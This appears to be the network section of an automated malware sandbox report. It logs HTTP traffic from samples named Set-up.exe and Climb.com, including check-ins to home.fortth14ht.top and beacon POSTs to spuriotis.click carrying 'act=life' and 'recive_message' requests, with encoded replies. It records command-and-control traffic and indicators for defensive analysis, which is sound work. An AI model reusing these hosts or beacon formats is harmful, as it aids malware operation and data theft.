                                                                                                                                                                      Data Ascii: GW1FZSIjLX9e5HnmV8SZXhM6yXFfXcrx9NVsHi1QxGHjiKLfuVadPFUaFb2VRWnSqOmoVqcoVaTnTnGb\/AIe4h4bzrhDOsw4d4iwX9nZzldb2GPwLxGExU8JiErzoVauCr4nDqvRb9niKKqurh60amHrxp1qdSnEqJ+v4f1NS1HJ2\/H+leseMR0U7Y3p\/L\/Gm0AV6KsVXoOgKKKKAIv7\/ANf6mmVKvVvr\/U01lxyOn8qD
                                                                                                                                                                      Dec 28, 2024 09:33:28.943634033 CET2472OUTData Raw: 51 78 37 47 6a 65 48 37 5c 2f 5c 2f 41 44 79 2b 30 66 35 39 4f 33 70 37 30 64 33 50 6d 62 76 2b 6d 6e 2b 52 5c 2f 6a 6a 39 4b 6d 6b 33 72 48 38 36 62 5c 2f 38 41 6e 6c 48 37 6a 50 62 5c 2f 41 44 39 61 5a 38 5c 2f 6c 7a 62 4a 50 6b 7a 62 5c 2f 41
                                                                                                                                                                      Data Ascii: Qx7GjeH7\/\/ADy+0f59O3p70d3Pmbv+mn+R\/jj9Kmk3rH86b\/8AnlH7jPb\/AD9aZ8\/lzbJPkzb\/APXeHt+H9aDQhkjRtjuPKTyvK6fv4rj\/AJ++v+Huah8wxxo+zjyv9X+Z\/P8Az04q00f3PnjT915Xf1\/4+v8Ar99c+nFJJs8ze3yJ\/wA84\/8AP6fWg6KdTfT+u6\/rtqU\/+WiIryP2\/wCmH8+MUNH99An\/A
                                                                                                                                                                      Dec 28, 2024 09:33:28.943681002 CET2472OUTData Raw: 73 36 77 32 56 35 64 67 71 32 49 77 4f 64 5a 33 58 79 72 41 34 48 49 38 4a 6d 6d 45 78 4f 4a 72 34 53 57 42 79 33 46 35 56 6c 65 59 71 74 58 6f 56 36 39 44 45 59 53 63 73 75 71 59 42 34 69 58 4c 78 33 67 76 34 35 36 72 61 58 6e 37 46 48 69 6e 55
                                                                                                                                                                      Data Ascii: s6w2V5dgq2IwOdZ3XyrA4HI8JmmExOJr4SWBy3F5VleYqtXoV69DEYScsuqYB4iXLx3gv456raXn7FHinUf2p38C\/s8fBPx1+wdrfxO\/Yol0P9oa01j4f+NPgh4r8Hy\/tBfF270Twn8NdZ+B3xaPjjxb4f8XfHS18c2\/jq\/8Ai9r0Hjm30HVPCVv4i0NdLW18Bv2lZ739jfw78BvhTr\/wF+HSRaX+09oPxy+GXxosv2+N
                                                                                                                                                                      Dec 28, 2024 09:33:36.173595905 CET157INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.22.1
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:33:35 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Content-Length: 1
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 30
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.449739194.87.58.92807744C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Dec 28, 2024 09:33:36.451956987 CET99OUTGET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1
                                                                                                                                                                      Host: home.fortth14ht.top
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Dec 28, 2024 09:33:38.914484024 CET372INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                      Server: nginx/1.22.1
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:33:38 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Content-Length: 207
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.449740194.87.58.92807744C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Dec 28, 2024 09:33:39.183497906 CET172OUTPOST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1
                                                                                                                                                                      Host: home.fortth14ht.top
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                      Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                                                                                                                                      Data Ascii: { "id1": "0", "data": "Done1" }
                                                                                                                                                                      Dec 28, 2024 09:33:40.774625063 CET372INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                      Server: nginx/1.22.1
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:33:40 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Content-Length: 207
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.4497303.218.7.1034437744C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-28 08:33:16 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                      Host: httpbin.org
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      2024-12-28 08:33:16 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:33:16 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Server: gunicorn/19.9.0
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                      2024-12-28 08:33:16 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                      Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.449737172.67.128.1844438000C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-28 08:33:36 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                      Host: spuriotis.click
                                                                                                                                                                      2024-12-28 08:33:36 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                      2024-12-28 08:33:56 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:33:56 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=69ru9a305e002hu5gj6mnfv1gu; expires=Wed, 23 Apr 2025 02:20:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J983IRTPenzgVNFrS28%2FFEwDITcRvyFlnpFnBHWqUv5jRSjCbw9bYy4Ebhy2SPqyHdK1hiFA1l6hRYQla02nyDuiRUYRArCdyuQimcXEu9E7iYkt8JmlO%2BIIP1AIGeFfZOU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f9034dcbb648ce3-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1809&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=906&delivery_rate=1576673&cwnd=252&unsent_bytes=0&cid=ae8cf63127118a87&ts=20267&x=0"
                                                                                                                                                                      2024-12-28 08:33:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                      2024-12-28 08:33:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.449741172.67.128.1844438000C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-28 08:33:58 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 45
                                                                                                                                                                      Host: spuriotis.click
                                                                                                                                                                      2024-12-28 08:33:58 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d
                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=5FwhVM--lll&j=
                                                                                                                                                                      2024-12-28 08:33:58 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:33:58 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=o7ot1lm0vsjcvhsuarl54q8to0; expires=Wed, 23 Apr 2025 02:20:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gr%2FcvG%2B8kqReJe%2FKF2%2FAKbb7IZC%2FCdxKROackN0f0QRonYmiYJaiqbHjyxd%2FTOTBd2aKlMPARrkr0mHBGYZ5OnHO98PppEUXcgeXUJFR95xpHNZcJNSAi7wNKrzYzEZGpE4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f903563693f8ce3-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1791&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=944&delivery_rate=1597374&cwnd=252&unsent_bytes=0&cid=1db98a43771f307f&ts=776&x=0"
                                                                                                                                                                      2024-12-28 08:33:58 UTC240INData Raw: 33 35 33 64 0d 0a 49 46 63 34 4a 6e 47 78 45 45 59 36 36 73 78 39 46 65 65 62 67 59 6d 50 37 52 68 52 68 57 48 33 62 41 42 5a 57 68 73 68 37 41 39 62 64 55 34 45 53 34 55 38 5a 45 6d 50 37 6b 64 68 6c 65 37 6b 70 61 32 4d 66 48 4f 2f 42 35 59 41 63 7a 78 32 4f 56 65 42 4c 52 6f 78 57 55 6f 43 31 44 78 6b 58 35 4c 75 52 30 36 63 75 65 54 6e 72 64 63 36 4e 4f 38 44 6c 67 42 69 4f 44 46 30 55 59 42 73 53 44 74 66 54 68 54 53 64 43 64 57 68 36 6b 59 63 49 62 78 37 2b 44 69 68 58 56 7a 71 55 4f 53 46 69 4a 6a 65 46 5a 45 6d 47 35 74 4e 6b 74 4e 55 38 77 38 50 52 69 50 6f 6c 38 76 78 66 72 6b 36 2b 4f 4c 66 44 72 74 43 5a 38 49 59 7a 30 77 61 30 69 4b 5a 30 67 31 58 45 38 65 32 32 41 71 58 49 43 69 48 6e 71 47 75 61
                                                                                                                                                                      Data Ascii: 353dIFc4JnGxEEY66sx9FeebgYmP7RhRhWH3bABZWhsh7A9bdU4ES4U8ZEmP7kdhle7kpa2MfHO/B5YAczx2OVeBLRoxWUoC1DxkX5LuR06cueTnrdc6NO8DlgBiODF0UYBsSDtfThTSdCdWh6kYcIbx7+DihXVzqUOSFiJjeFZEmG5tNktNU8w8PRiPol8vxfrk6+OLfDrtCZ8IYz0wa0iKZ0g1XE8e22AqXICiHnqGua
                                                                                                                                                                      2024-12-28 08:33:58 UTC1369INData Raw: 32 72 36 70 63 36 61 36 64 51 70 77 31 7a 4b 69 31 30 55 34 67 74 58 58 74 44 42 42 54 66 4d 6e 77 59 67 4b 49 52 63 6f 62 32 35 4f 72 74 6e 58 55 7a 35 41 75 64 43 6d 67 30 4e 33 5a 4e 68 47 70 4b 50 46 31 4c 46 4e 74 30 4b 31 76 49 34 46 39 77 6e 62 6d 37 71 38 32 66 65 54 44 7a 44 6f 52 4f 66 58 55 68 4f 55 53 43 4c 52 70 31 58 45 6f 53 33 6e 49 32 55 49 4f 6c 47 6d 57 4f 38 4f 37 6d 37 59 4a 77 50 4f 51 44 6b 67 52 6f 4e 44 4a 39 54 6f 4e 72 51 6a 55 61 43 6c 50 55 61 6d 51 41 79 49 30 61 5a 34 4c 31 39 61 6e 58 7a 32 56 39 2f 6b 4f 53 41 69 4a 6a 65 48 46 47 6a 57 35 4a 4f 6c 6c 4d 47 4d 46 79 4e 6c 36 46 71 77 31 78 67 50 66 70 36 50 2b 46 64 44 58 6b 43 70 34 48 5a 7a 77 38 4f 51 33 4f 61 6c 70 31 41 67 51 79 33 6e 6b 6f 55 70 2b 75 58 32 6a 4c 34
                                                                                                                                                                      Data Ascii: 2r6pc6a6dQpw1zKi10U4gtXXtDBBTfMnwYgKIRcob25OrtnXUz5AudCmg0N3ZNhGpKPF1LFNt0K1vI4F9wnbm7q82feTDzDoROfXUhOUSCLRp1XEoS3nI2UIOlGmWO8O7m7YJwPOQDkgRoNDJ9ToNrQjUaClPUamQAyI0aZ4L19anXz2V9/kOSAiJjeHFGjW5JOllMGMFyNl6Fqw1xgPfp6P+FdDXkCp4HZzw8OQ3Oalp1AgQy3nkoUp+uX2jL4
                                                                                                                                                                      2024-12-28 08:33:58 UTC1369INData Raw: 44 63 44 58 6f 44 70 6c 4f 4c 48 73 2f 59 51 50 57 4c 57 67 32 54 6b 63 5a 6b 55 63 6e 56 6f 61 70 43 54 65 61 74 2f 71 72 36 6f 4d 36 61 36 63 4f 6c 41 5a 6b 4b 54 64 30 51 49 42 6a 54 54 42 56 54 42 50 54 66 79 46 63 67 36 55 63 65 6f 48 72 36 65 76 6c 69 6e 73 35 37 55 50 62 54 6d 55 6a 65 43 45 44 76 33 70 4a 64 32 39 48 48 64 31 31 4d 68 69 58 34 41 59 33 67 76 57 6a 73 36 32 43 63 6a 62 69 44 4a 51 45 62 44 34 79 64 55 75 41 62 6c 41 36 58 6b 51 66 32 33 67 70 56 6f 79 6d 46 6e 79 4f 2f 2b 50 71 35 38 38 30 63 2b 41 62 31 56 59 69 44 7a 39 31 54 6f 45 76 64 7a 5a 55 53 68 54 46 4d 6a 73 57 6b 65 34 59 65 38 57 68 6f 2b 66 6b 6a 33 45 35 34 77 4f 53 41 32 63 34 50 33 70 4f 69 57 64 4d 4d 6c 35 49 47 74 35 30 4a 46 2b 4d 71 77 31 79 6a 50 58 76 71 36
                                                                                                                                                                      Data Ascii: DcDXoDplOLHs/YQPWLWg2TkcZkUcnVoapCTeat/qr6oM6a6cOlAZkKTd0QIBjTTBVTBPTfyFcg6UceoHr6evlins57UPbTmUjeCEDv3pJd29HHd11MhiX4AY3gvWjs62CcjbiDJQEbD4ydUuAblA6XkQf23gpVoymFnyO/+Pq5880c+Ab1VYiDz91ToEvdzZUShTFMjsWke4Ye8Who+fkj3E54wOSA2c4P3pOiWdMMl5IGt50JF+Mqw1yjPXvq6
                                                                                                                                                                      2024-12-28 08:33:58 UTC1369INData Raw: 2b 45 32 4d 54 6d 55 33 65 43 45 44 68 32 52 51 4f 31 52 4e 48 74 56 36 49 31 61 46 70 52 6c 38 67 76 37 6c 35 75 57 43 66 7a 44 6d 42 35 38 63 59 54 41 79 64 45 6e 4f 49 77 49 79 51 67 52 4c 6b 31 55 6f 63 5a 69 31 44 57 48 46 35 71 33 79 72 59 68 32 63 37 39 44 6c 67 46 72 4e 44 42 78 54 49 46 70 54 44 4e 63 53 52 62 63 65 44 5a 51 68 71 4d 55 65 49 37 72 34 2b 62 70 67 33 34 37 37 41 6e 56 51 43 49 38 49 44 6b 62 7a 6c 68 50 4f 6c 70 48 42 5a 4e 74 61 6b 48 49 71 52 4d 33 33 62 6e 76 35 65 32 41 64 6a 2f 73 43 35 51 43 62 44 77 39 63 45 75 47 66 30 4d 78 55 6b 55 64 33 48 4d 67 58 59 32 71 47 48 4f 44 39 71 4f 6c 72 59 68 69 63 37 39 44 75 69 6c 58 65 52 6c 44 41 35 45 6a 57 33 56 64 53 46 4f 4c 4d 69 68 62 68 4b 59 51 63 59 7a 31 36 65 4c 6d 67 33 45
                                                                                                                                                                      Data Ascii: +E2MTmU3eCEDh2RQO1RNHtV6I1aFpRl8gv7l5uWCfzDmB58cYTAydEnOIwIyQgRLk1UocZi1DWHF5q3yrYh2c79DlgFrNDBxTIFpTDNcSRbceDZQhqMUeI7r4+bpg3477AnVQCI8IDkbzlhPOlpHBZNtakHIqRM33bnv5e2Adj/sC5QCbDw9cEuGf0MxUkUd3HMgXY2qGHOD9qOlrYhic79DuilXeRlDA5EjW3VdSFOLMihbhKYQcYz16eLmg3E
                                                                                                                                                                      2024-12-28 08:33:58 UTC1369INData Raw: 51 74 74 4f 6a 6c 2f 55 59 6c 6b 55 44 74 58 53 78 76 62 65 79 56 63 6a 61 4d 5a 65 34 2f 34 35 4f 58 6a 68 7a 70 39 70 77 53 4e 54 6a 70 37 47 57 6c 59 6e 48 74 50 46 46 64 4c 55 38 77 38 50 52 69 50 6f 6c 38 76 78 66 44 78 37 2b 43 64 63 7a 54 70 44 4a 59 63 59 7a 59 7a 61 30 53 42 61 55 55 35 58 45 73 56 30 6e 63 75 56 49 2b 72 46 48 69 4a 75 61 32 72 36 70 63 36 61 36 63 74 6e 68 31 31 4f 44 5a 79 56 5a 55 74 58 58 74 44 42 42 54 66 4d 6e 77 59 69 36 55 55 63 34 58 31 34 2b 2f 67 6a 32 67 38 34 41 53 63 42 58 41 78 50 33 35 49 68 6d 5a 4e 4d 30 68 49 48 63 46 33 4e 6b 72 49 34 46 39 77 6e 62 6d 37 71 39 75 49 61 69 50 6b 51 61 51 59 59 53 30 7a 64 45 2f 4f 63 67 77 73 47 6b 4d 66 6b 79 70 6b 58 6f 65 6e 48 48 69 45 38 4f 2f 6d 36 49 5a 2f 4d 75 45 48
                                                                                                                                                                      Data Ascii: QttOjl/UYlkUDtXSxvbeyVcjaMZe4/45OXjhzp9pwSNTjp7GWlYnHtPFFdLU8w8PRiPol8vxfDx7+CdczTpDJYcYzYza0SBaUU5XEsV0ncuVI+rFHiJua2r6pc6a6ctnh11ODZyVZUtXXtDBBTfMnwYi6UUc4X14+/gj2g84AScBXAxP35IhmZNM0hIHcF3NkrI4F9wnbm7q9uIaiPkQaQYYS0zdE/OcgwsGkMfkypkXoenHHiE8O/m6IZ/MuEH
                                                                                                                                                                      2024-12-28 08:33:58 UTC1369INData Raw: 67 6a 4f 56 7a 41 64 41 49 79 56 67 52 4c 6b 33 45 6a 57 34 6d 6b 46 6e 75 4b 2f 75 66 35 35 34 68 6f 4d 75 59 49 6d 41 4a 69 4e 6a 56 7a 51 6f 64 67 54 6a 68 64 51 78 7a 57 4d 6d 6f 59 6a 37 5a 66 4c 38 58 59 37 75 44 68 31 43 42 7a 2b 45 32 4d 54 6d 55 33 65 43 45 44 6a 6d 64 48 50 31 64 48 48 4e 42 67 4a 56 36 61 72 68 4a 39 6c 2f 50 6f 37 75 43 43 64 7a 44 68 42 5a 34 43 63 44 49 34 65 6b 6a 4f 49 77 49 79 51 67 52 4c 6b 31 45 7a 54 6f 4b 70 45 32 47 4f 2b 4f 44 39 34 4a 38 36 66 61 63 53 6b 68 38 69 59 79 35 70 56 49 6c 79 44 43 77 61 51 78 2b 54 4b 6d 52 65 67 61 67 59 63 59 76 72 35 75 33 69 67 48 4d 36 34 77 75 57 44 6d 59 2f 50 33 78 41 67 6d 5a 46 4e 6c 56 41 47 74 31 37 4b 78 6a 47 37 68 68 76 78 61 47 6a 79 76 61 4d 64 6a 36 6e 48 4e 73 58 49
                                                                                                                                                                      Data Ascii: gjOVzAdAIyVgRLk3EjW4mkFnuK/uf554hoMuYImAJiNjVzQodgTjhdQxzWMmoYj7ZfL8XY7uDh1CBz+E2MTmU3eCEDjmdHP1dHHNBgJV6arhJ9l/Po7uCCdzDhBZ4CcDI4ekjOIwIyQgRLk1EzToKpE2GO+OD94J86facSkh8iYy5pVIlyDCwaQx+TKmRegagYcYvr5u3igHM64wuWDmY/P3xAgmZFNlVAGt17KxjG7hhvxaGjyvaMdj6nHNsXI
                                                                                                                                                                      2024-12-28 08:33:58 UTC1369INData Raw: 45 6c 69 30 61 64 58 70 50 42 64 5a 31 4d 68 71 39 72 52 46 35 67 75 2b 6a 39 4e 4c 42 4f 6a 7a 39 51 38 30 33 65 33 73 2f 64 51 50 57 4c 56 63 79 57 6b 4d 4a 78 58 55 6f 53 59 4f 6a 45 31 57 4b 2f 76 58 6f 34 6f 78 72 4f 71 73 49 6d 45 34 73 65 7a 39 68 41 39 59 74 62 54 4a 4d 52 7a 7a 51 59 79 30 59 78 75 34 59 59 63 57 68 6f 39 57 74 6e 58 6b 6a 35 41 79 45 4d 43 4a 6a 49 55 63 44 68 58 74 46 4a 56 6c 53 47 4e 35 2b 4e 57 62 49 39 6b 73 6c 31 36 75 78 75 66 4c 50 5a 51 79 70 51 35 52 4f 4f 67 49 68 4f 56 58 4f 4e 52 42 37 47 6c 5a 54 69 7a 4a 6a 57 35 71 38 47 58 53 54 2b 71 54 56 30 36 68 73 4f 65 41 54 6b 68 6c 74 65 33 59 35 54 4d 34 31 65 33 56 54 51 77 6a 43 5a 43 6c 49 6a 2b 34 67 4f 63 58 68 6f 37 4f 74 75 6e 6b 39 36 51 53 44 48 79 38 63 4c 6e
                                                                                                                                                                      Data Ascii: Eli0adXpPBdZ1Mhq9rRF5gu+j9NLBOjz9Q803e3s/dQPWLVcyWkMJxXUoSYOjE1WK/vXo4oxrOqsImE4sez9hA9YtbTJMRzzQYy0Yxu4YYcWho9WtnXkj5AyEMCJjIUcDhXtFJVlSGN5+NWbI9ksl16uxufLPZQypQ5ROOgIhOVXONRB7GlZTizJjW5q8GXST+qTV06hsOeATkhlte3Y5TM41e3VTQwjCZClIj+4gOcXho7Otunk96QSDHy8cLn
                                                                                                                                                                      2024-12-28 08:33:58 UTC1369INData Raw: 66 44 52 58 53 31 2f 64 65 53 52 66 6d 4c 67 45 4f 34 33 36 2b 66 48 54 73 56 45 2f 34 51 53 50 43 57 51 64 47 44 6b 4e 7a 6d 49 43 62 57 4d 45 57 35 4e 4e 61 68 69 51 37 6b 63 33 73 50 72 74 35 65 71 5a 61 33 37 50 49 4b 38 30 49 42 63 2f 62 41 47 36 61 6c 49 6b 55 55 6b 66 6b 7a 78 6b 58 73 6a 32 54 7a 6e 46 2f 66 4b 72 74 64 38 6f 61 4c 4a 51 77 6c 34 77 4a 48 5a 67 41 35 67 74 47 6d 63 55 42 41 47 54 4b 6d 51 66 69 37 77 4e 63 59 62 76 34 4b 7a 54 73 56 30 39 34 41 4b 44 48 6e 55 30 42 6b 64 57 6a 57 4e 4d 4d 6b 78 56 55 35 30 79 4b 78 6a 51 6c 31 38 2f 78 63 61 74 71 2f 58 50 49 6e 50 53 41 4a 73 41 5a 53 30 70 4e 47 53 41 61 6b 4d 6a 53 6c 4d 63 6b 7a 78 6b 58 73 6a 32 54 54 6e 46 2f 66 4b 72 74 64 38 6f 61 4c 4a 51 77 6c 34 77 4a 48 5a 67 41 35 67
                                                                                                                                                                      Data Ascii: fDRXS1/deSRfmLgEO436+fHTsVE/4QSPCWQdGDkNzmICbWMEW5NNahiQ7kc3sPrt5eqZa37PIK80IBc/bAG6alIkUUkfkzxkXsj2TznF/fKrtd8oaLJQwl4wJHZgA5gtGmcUBAGTKmQfi7wNcYbv4KzTsV094AKDHnU0BkdWjWNMMkxVU50yKxjQl18/xcatq/XPInPSAJsAZS0pNGSAakMjSlMckzxkXsj2TTnF/fKrtd8oaLJQwl4wJHZgA5g
                                                                                                                                                                      2024-12-28 08:33:58 UTC1369INData Raw: 6b 6b 63 31 44 41 45 58 35 36 74 58 7a 6e 46 39 61 4f 7a 72 59 35 77 49 2b 6f 4d 6b 6b 4a 6c 49 54 38 35 44 63 35 6a 41 6d 30 61 52 52 6e 44 66 79 74 66 78 4b 67 52 65 63 58 6d 72 66 4b 74 6d 54 70 72 74 45 33 56 48 43 4a 6a 65 44 35 41 6e 48 39 45 4e 6b 78 48 56 4f 31 4d 43 55 71 50 76 68 77 31 74 50 54 6e 2f 66 69 4d 61 6a 54 5a 50 62 67 63 5a 53 73 37 4f 33 4b 59 62 6b 49 37 58 51 52 64 6b 32 70 6b 41 4d 69 44 44 58 43 56 2b 71 4f 6c 72 59 4d 36 61 36 63 4f 68 77 6c 79 4f 48 52 2b 57 59 6b 74 58 58 74 44 42 41 57 54 4b 6e 63 57 79 4c 78 66 4c 38 57 2b 37 65 62 73 6a 48 51 77 39 52 47 54 44 58 51 34 66 30 64 39 6f 33 39 46 4a 56 6b 47 49 74 35 32 4d 6b 32 4c 76 68 68 4a 75 39 54 78 37 50 32 4d 4f 42 2f 67 44 70 6b 77 58 41 77 70 66 6c 50 4d 53 30 45 6a
